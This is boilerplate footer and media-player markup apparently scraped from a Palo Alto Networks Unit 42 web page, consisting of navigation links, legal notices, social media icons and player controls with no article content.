* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
